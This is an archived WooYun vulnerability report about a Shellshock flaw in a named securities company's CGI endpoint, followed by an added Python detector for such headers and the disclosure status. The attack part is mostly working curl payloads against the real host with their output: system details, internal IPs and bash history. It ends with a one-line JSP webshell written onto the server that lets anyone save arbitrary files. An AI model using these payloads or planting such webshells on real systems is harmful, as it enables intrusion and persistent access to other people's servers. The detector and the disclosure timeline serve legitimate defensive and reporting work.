WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-09-10: Details reported to the vendor, awaiting the vendor's handling
2015-09-11: Vendor has confirmed; details disclosed to the vendor only
2015-09-21: Details disclosed to core white hats and experts in the relevant field
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to intern white hats
2015-10-26: Details disclosed to the public
As the title says: arbitrary system command execution, a threat reaching the main site directly.
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/bin/cat /etc/issue" http://www.gkzq.com.cn/cgi-bin/test-cgi
Red Hat Enterprise Linux Server release 5.7 (Tikanga)
Kernel \r on an \m
Checked which user the commands run as.
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/usr/bin/whoami" http://www.gkzq.com.cn/cgi-bin/test-cgi
weblogic
It turned out to be weblogic, so probably not in the root group either.
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/usr/bin/id" http://www.gkzq.com.cn/cgi-bin/test-cgi
uid=1000(weblogic) gid=1000(weblogic) groups=1000(weblogic)
Out of habit, checked the IP address as well; still an internal address.
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/sbin/ifconfig" http://www.gkzq.com.cn/cgi-bin/test-cgi
bond0     Link encap:Ethernet  HWaddr AC:16:2D:8A:01:F8
          inet addr:10.200.3.4  Bcast:10.200.3.15  Mask:255.255.255.240
          UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
          RX packets:3203379937 errors:0 dropped:0 overruns:0 frame:2
          TX packets:4834148049 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:830582707308 (773.5 GiB)  TX bytes:3638374711428 (3.3 TiB)

eth0      Link encap:Ethernet  HWaddr AC:16:2D:8A:01:F8
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:3203379937 errors:0 dropped:0 overruns:0 frame:2
          TX packets:4834148049 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:830582707308 (773.5 GiB)  TX bytes:3638374711428 (3.3 TiB)
          Interrupt:83 Memory:f6bf0000-f6c00000

eth1      Link encap:Ethernet  HWaddr AC:16:2D:8A:01:F8
          UP BROADCAST SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:91 Memory:f6bc0000-f6bd0000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:3800316349 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3800316349 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:773668241712 (720.5 GiB)  TX bytes:773668241712 (720.5 GiB)
Since the user is weblogic and commands can be executed, took a look at /home/weblogic/.bash_history
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/bin/cat /home/weblogic/.bash_history" http://www.gkzq.com.cn/cgi-bin/test-cgi
ll
cd -
vi jjrServer.jsp
cd -
cd ..
rz
cd ../wsyyt/
vi xxgs_jjr.jsp
cd /opt/bea/user_projects/xxxxxxxxxxx/xxxxxxxxx/newback.war/
ll
cd /opt/bea/user_projects/xxxxxxxxxxx/xxxxxxxxx/gkzq.war/wsyyt/server/
vi jjrListServer.jsp
....................
That gave the site's physical path; a Baidu search turned up the real URL, and a small webshell was written in passing.
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/bin/echo '<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"/\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes());%>ok'>/opt/bea/user_projects/XXXXXX/XXXXXXX/gkzq.war/wsyyt/wooyun.jsp" http://www.gkzq.com.cn/cgi-bin/test-cgi
http://www.gkzq.com.cn/gkzq/wsyyt/wooyun.jsp: the internal network can be reached at any time.
Not going any deeper~ remember to delete it.
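The vector used throughout this report is a Shellshock-style bash function definition delivered in an HTTP header: a CGI server exports every request header as an HTTP_* environment variable, so an arbitrary header name such as "xxx" reaches the bash child just as well as User-Agent would. The detector below is an added example, not part of the original report or the archive; it parses a raw request and flags any header value that is a function definition followed by trailing commands. The sample requests are constructed and use a placeholder host.

```python
import re
from typing import Dict, List, Tuple

# A Shellshock payload is a header value that bash parses as a function
# definition "() { ... }" with extra commands after the closing brace;
# unpatched bash ran that trailer while importing the CGI environment.
FUNC_DEF = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;\s*(?P<trailer>.+)$", re.S)


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (request line, headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return request_line, headers


def find_shellshock_headers(raw: bytes) -> List[Tuple[str, str]]:
    """Return (header name, trailing command) for every suspicious header.
    Every header is checked, not just User-Agent or Referer: a CGI server
    exports each as HTTP_<NAME> into the environment, so a custom name such
    as "xxx" reaches bash just as well as a standard one."""
    _, headers = parse_request(raw)
    hits = []
    for name, value in headers.items():
        match = FUNC_DEF.match(value)
        if match:
            hits.append((name, match.group("trailer").strip()))
    return hits


# Constructed sample requests with a placeholder host: the first reuses the
# header payload shape seen in the report, the second is an ordinary request.
MALICIOUS = (
    b"GET /cgi-bin/test-cgi HTTP/1.1\r\n"
    b"Host: cgi.example.invalid\r\n"
    b"xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/bin/cat /etc/issue\r\n"
    b"\r\n"
)
BENIGN = (
    b"GET /cgi-bin/test-cgi HTTP/1.1\r\n"
    b"Host: cgi.example.invalid\r\n"
    b"User-Agent: curl/7.29.0\r\n"
    b"\r\n"
)
```

Running `find_shellshock_headers(MALICIOUS)` returns the offending header name together with the command tail, which is what a WAF rule or log-replay job would alert on; the benign request yields an empty list.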
Severity: High
Vulnerability Rank: 13
Confirmed at: 2015-09-11 10:44
CNVD has confirmed and reproduced the described situation; it has been passed to CNCERT for notification to the securities industry's IT regulatory authority, which will coordinate the follow-up handling by the website's operating unit.
None yet.